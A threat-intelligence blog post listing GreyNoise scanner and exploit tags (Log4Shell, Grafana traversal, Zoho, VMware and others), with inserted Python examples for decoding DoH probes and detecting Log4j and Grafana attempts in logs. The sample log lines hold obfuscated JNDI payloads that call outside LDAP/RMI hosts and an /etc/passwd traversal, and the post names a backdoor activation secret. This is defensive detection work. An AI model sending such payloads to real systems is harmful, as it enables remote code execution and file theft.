GreyNoise Tag Round Up | January 2022

While you will be able to find a comprehensive list of all the tags created since our last round up below, the GreyNoise Research team wanted to highlight some interesting tags.

Apache Log4j RCE Attempt [Intention: Malicious]

Self-explanatory: Log4Shell, CVE-2021-44228, and the follow-up CVE-2021-45046.

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This tag was created this week as a result of the research done by the Avast team.

DNS Over HTTPS Scanner [Intention: Unknown]

A relatively new protocol. It is interesting precisely because it raises the question "why would you scan the Internet for that?", and there is no clear motive that we can tell.

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

A critical remote code execution vulnerability in http.sys, the kernel-mode HTTP protocol stack in Microsoft Windows.

VMware vCenter SSRF Attempt [Intention: Malicious]

Widely deployed VMware virtualization management software.

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

A critical vulnerability in a popular help desk platform.

It has been a while since we last published a Tag Round Up! If these are helpful to you, or you have suggestions on what you would like to see, please reach out to community@greynoise.io

Antiwork Port 9100 Print Request [Intention: Unknown]

This IP address has been observed sending raw TCP requests to network printers on port 9100, the raw (JetDirect-style) print port.

See it on GreyNoise Viz

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This IP address has been observed sending the known activation secret "CB5766F7436E22509381CA605B98685C8966F16B" to a Windows backdoor that uses the WinDivert packet capture and injection driver.

See it on GreyNoise Viz

DNS Over HTTPS Scanner [Intention: Unknown]

This IP address has been observed sending DNS over HTTPS (DoH) queries and looking for hosts that answer them.

See it on GreyNoise Viz
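To make the behaviour behind this tag concrete, here is an added example (not GreyNoise code, and not taken from any scanner) of what an RFC 8484 DoH probe looks like on the wire and how to recognise one in a web server access log. The `/dns-query` path, the host names and addresses, and the access-log line are all constructed for the example; the `dns=` value it produces for `www.example.com` is the GET example given in RFC 8484 itself.

```python
import base64
import re
import struct
from urllib.parse import parse_qs

# Assumed for this example: the path most public DoH resolvers use (RFC 8484 leaves the path to the server).
DOH_PATH = "/dns-query"

# Constructed sample access-log line; the dns= value is the RFC 8484 example query for www.example.com.
SAMPLE_LOG_LINE = ('198.51.100.7 - - [12/Jan/2022:10:00:00 +0000] '
                   '"GET /dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" '
                   '404 0 "-" "Go-http-client/1.1"')


def build_dns_query(qname, qtype=1, txid=0):
    """Minimal RFC 1035 wire-format query: 12-byte header plus one question.
    ID 0 is what RFC 8484 recommends so that DoH responses are cacheable."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD set; QDCOUNT=1
    question = b""
    for label in qname.rstrip(".").split("."):
        question += bytes([len(label)]) + label.encode("ascii")
    question += b"\x00" + struct.pack("!HH", qtype, 1)  # root label, QTYPE, QCLASS IN
    return header + question


def b64url_nopad(data):
    """RFC 8484 requires base64url without '=' padding in the dns= parameter."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def build_doh_get(host, qname, qtype=1):
    """The HTTP/1.1 request a DoH scanner would send using the GET method (RFC 8484 section 4.1)."""
    return (f"GET {DOH_PATH}?dns={b64url_nopad(build_dns_query(qname, qtype))} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Accept: application/dns-message\r\n\r\n")


def parse_question(wire):
    """Return (qname, qtype) from the single question of a wire-format DNS message."""
    qdcount = struct.unpack("!H", wire[4:6])[0]
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels, pos = [], 12
    while True:
        length = wire[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointers are not valid in a question name")
        labels.append(wire[pos:pos + length].decode("ascii"))
        pos += length
    qtype, _qclass = struct.unpack("!HH", wire[pos:pos + 4])
    return ".".join(labels), qtype


_DOH_GET = re.compile(r'/dns-query\?([^\s"]+)')


def decode_doh_probe(text):
    """Find a DoH GET in a request or access-log line and return (qname, qtype), or None if there is none."""
    m = _DOH_GET.search(text)
    if not m:
        return None
    params = parse_qs(m.group(1))
    if "dns" not in params:
        return None
    raw = params["dns"][0]
    try:
        wire = base64.urlsafe_b64decode(raw + "=" * (-len(raw) % 4))  # restore the stripped padding
        return parse_question(wire)
    except (ValueError, IndexError, UnicodeDecodeError, struct.error):
        return None  # malformed or truncated: not a usable DoH probe


if __name__ == "__main__":
    print(build_doh_get("203.0.113.10", "www.example.com"))
    print(decode_doh_probe(SAMPLE_LOG_LINE))
```

Two caveats when turning this into detection: a DoH client may also POST the wire-format message with `Content-Type: application/dns-message`, which leaves no `dns=` parameter in the access log, and nothing forces a scanner to use `/dns-query`, so treat the path as a common default rather than a signature.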

Generic Unix Reverse Shell Attempt [Intention: Malicious]

This IP address has been observed attempting to spawn a generic Unix reverse shell through a web request.

See it on GreyNoise Viz

iKettle Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover iKettle devices.

See it on GreyNoise Viz

InfluxDB Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover InfluxDB instances.

See it on GreyNoise Viz

IRC Crawler [Intention: Unknown]

This IP address has been observed sending the NICK and USER commands used to register a connection with an IRC server.

See it on GreyNoise Viz

iSCSI Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover hosts that respond to iSCSI login requests.

See it on GreyNoise Viz

Jira REST API Crawler [Intention: Unknown]

This IP address has been observed attempting to enumerate Jira instances through the Jira REST API.

See it on GreyNoise Viz

Apache Druid RCE Attempt [Intention: Malicious]

CVE-2021-25646

This IP address has been observed attempting to exploit CVE-2021-25646, a remote code execution vulnerability in Apache Druid 0.20.0 and earlier.

See it on GreyNoise Viz

Apache Log4j RCE Attempt [Intention: Malicious]

CVE-2021-44228 | CVE-2021-45046

This IP address has been observed attempting to exploit CVE-2021-44228 and CVE-2021-45046, remote code execution vulnerabilities (Log4Shell) in the popular Java logging library Apache Log4j. CVE-2021-44228 affects versions 2.14.1 and earlier; CVE-2021-45046 affects versions 2.15.0 and earlier.

See it on GreyNoise Viz

CentOS Web Panel RCE Attempt [Intention: Malicious]

This IP address has been observed attempting to exploit a vulnerability in CentOS Web Panel which can lead to elevated privileges and remote code execution.

See it on GreyNoise Viz

FHEM LFI [Intention: Malicious]

CVE-2020-19360

This IP address has been observed attempting to exploit CVE-2020-19360, a local file inclusion vulnerability in the FHEM Perl-based home automation server.

See it on GreyNoise Viz

GLPI SQL Injection Attempt [Intention: Malicious]

CVE-2019-10232

This IP address has been observed attempting to exploit CVE-2019-10232, an SQL injection vulnerability in the GLPI IT service management software.

See it on GreyNoise Viz

Grafana Path Traversal Attempt [Intention: Malicious]

CVE-2021-43798

This IP address has been observed attempting to exploit CVE-2021-43798, a path traversal and arbitrary file read vulnerability in Grafana.

See it on GreyNoise Viz

Grafana Path Traversal Check [Intention: Unknown]

CVE-2021-43798

This IP address has been observed attempting to check for the presence of CVE-2021-43798, a path traversal and arbitrary file read vulnerability in Grafana.

See it on GreyNoise Viz
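As an added example (not GreyNoise's tagging logic, and not code from either project), the following Python scans constructed access-log lines for the two behaviours described in the Apache Log4j RCE Attempt entry above and in the two Grafana entries. It peels the nested-lookup tricks used to hide a JNDI string (`${lower:j}`, `${::-j}`, `${env:X:-n}`, URL encoding) before looking for `${jndi:`, and it resolves `..` segments in `/public/plugins/<plugin>/` requests to see whether the request escapes the plugin directory. The log lines, addresses and host names are made up; the tag names in the output are taken from this page, but how GreyNoise separates a "Check" from an "Attempt" is not on the page and is not reproduced here, so the example simply reports the resolved target path.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); addresses are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2022:01:02:03 +0000] "GET / HTTP/1.1" 200 12 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.6 - - [10/Jan/2022:01:02:04 +0000] "GET /login?u=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A'
    '%2F%2F198.51.100.4%3A1099%2Fx%7D HTTP/1.1" 200 12 "-" "curl/7.79.1"',
    '203.0.113.7 - - [10/Jan/2022:01:02:05 +0000] "GET /api HTTP/1.1" 200 12 "-" '
    '"${${lower:j}${upper:n}${env:NOPE:-d}i:ldaps://203.0.113.9:636/o}"',
    '203.0.113.8 - - [10/Jan/2022:01:02:06 +0000] "GET /public/plugins/alertlist/../../../../etc/passwd '
    'HTTP/1.1" 404 0 "-" "python-requests/2.26.0"',
    '203.0.113.9 - - [10/Jan/2022:01:02:07 +0000] "GET /public/plugins/alertlist/img/icn-singlestat-panel.svg '
    'HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]

# Innermost Log4j lookups only (no ${ inside them), so repeated substitution peels one obfuscation layer per round.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-default} collapses to its default; the jndi lookup itself is excluded so a ':-' in a URL is left alone.
_DEFAULT_LOOKUP = re.compile(r"\$\{(?!jndi:)[^${}]*:-([^${}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{jndi:([a-z0-9]+):/*([^\s/}]+)", re.IGNORECASE)
_REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) ([^" ]+) HTTP/[\d.]+"')
_PLUGIN_PATH = re.compile(r"^/public/plugins/([^/]+)/")


def normalize_lookups(text, max_rounds=10):
    """Undo URL encoding and the common nested-lookup tricks used to hide ${jndi:...}."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), text)
        new = _DEFAULT_LOOKUP.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text


def detect_log4shell(line):
    """Return {'scheme', 'host'} if the whole line (path, query or any logged header) carries a JNDI lookup."""
    m = _JNDI.search(normalize_lookups(line))
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "host": m.group(2)}


def detect_grafana_traversal(line):
    """Return {'plugin', 'target'} if a /public/plugins/<plugin>/ request resolves outside that plugin directory."""
    m = _REQUEST_LINE.search(line)
    if not m:
        return None
    path = unquote(m.group(1).split("?", 1)[0])
    pm = _PLUGIN_PATH.match(path)
    if not pm:
        return None
    resolved = posixpath.normpath(path)  # collapse ../ segments to see where the request really points
    if resolved.startswith(pm.group(0)):
        return None  # ordinary asset fetch that stays inside the plugin directory
    return {"plugin": pm.group(1), "target": resolved}


def scan(lines):
    """Map each line to (source IP, tag name from this round-up, details) for every behaviour matched."""
    findings = []
    for line in lines:
        src = line.split(" ", 1)[0]
        hit = detect_log4shell(line)
        if hit:
            findings.append((src, "Apache Log4j RCE Attempt", hit))
        hit = detect_grafana_traversal(line)
        if hit:
            findings.append((src, "Grafana Path Traversal Attempt", hit))
    return findings


if __name__ == "__main__":
    for src, tag, details in scan(SAMPLE_LOG):
        print(f"{src:15} {tag}: {details}")
```

Two practical notes: Log4j payloads usually arrive in headers such as User-Agent or X-Api-Version rather than the path, so the JNDI check runs over the whole logged line rather than the request target; and the Grafana check only works on the raw request line, because a reverse proxy or HTTP client that normalises `..` before logging (or before forwarding) hides exactly the thing being looked for.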

HRsale LFI [Intention: Malicious]

CVE-2020-27993

This IP address has been observed attempting to exploit CVE-2020-27993, a local file inclusion vulnerability in HRsale.

See it on GreyNoise Viz

Metabase LFI Attempt [Intention: Malicious]

CVE-2021-41277

This IP address has been observed attempting to exploit CVE-2021-41277, a local file inclusion vulnerability in Metabase.

See it on GreyNoise Viz

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

CVE-2021-31166

This IP address has been observed attempting to exploit CVE-2021-31166, a remote code execution vulnerability in the Windows HTTP protocol stack (http.sys).

See it on GreyNoise Viz

Motorola Baby Monitor RCE Attempt [Intention: Malicious]

CVE-2021-3577

This IP address has been observed attempting to exploit CVE-2021-3577, a remote command execution vulnerability in Motorola Halo+ baby monitors.

See it on GreyNoise Viz

NodeBB API Token Bypass Attempt [Intention: Malicious]

CVE-2021-43786

This IP address has been observed attempting to exploit CVE-2021-43786, a flaw in NodeBB's handling of the master API token that unintentionally grants access and can lead to remote code execution.

See it on GreyNoise Viz

October CMS Password Reset Scanner [Intention: Malicious]

CVE-2021-32648

This IP address has been observed attempting to exploit CVE-2021-32648, a password reset vulnerability in October CMS.

See it on GreyNoise Viz

TP-Link TL-WR840N RCE Attempt [Intention: Malicious]

CVE-2021-41653

This IP address has been observed attempting to exploit CVE-2021-41653, a remote command execution vulnerability in the TP-Link TL-WR840N EU v5 router.

See it on GreyNoise Viz

VMware vCenter Arbitrary File Read Attempt [Intention: Malicious]

CVE-2021-21980

This IP address has been observed attempting to exploit CVE-2021-21980, an unauthorized arbitrary file read vulnerability in the vSphere Web Client (FLEX/Flash).

See it on GreyNoise Viz

VMware vCenter SSRF Attempt [Intention: Malicious]

CVE-2021-22049

This IP address has been observed attempting to exploit CVE-2021-22049, a server-side request forgery vulnerability in the vSphere Web Client.

See it on GreyNoise Viz

WebSVN 2.6.0 RCE CVE-2021-32305 [Intention: Malicious]

CVE-2021-32305

This IP address has been observed scanning the Internet for hosts vulnerable to CVE-2021-32305, a remote code execution vulnerability in WebSVN 2.6.0 caused by unescaped shell metacharacters in the search parameter.

See it on GreyNoise Viz

Zimbra Collaboration Suite XXE Attempt [Intention: Malicious]

CVE-2019-9670

This IP address has been observed attempting to exploit CVE-2019-9670, an XXE vulnerability in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.

See it on GreyNoise Viz

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

CVE-2021-44077

This IP address has been observed attempting to exploit CVE-2021-44077, a remote command execution vulnerability in Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014.

See it on GreyNoise Viz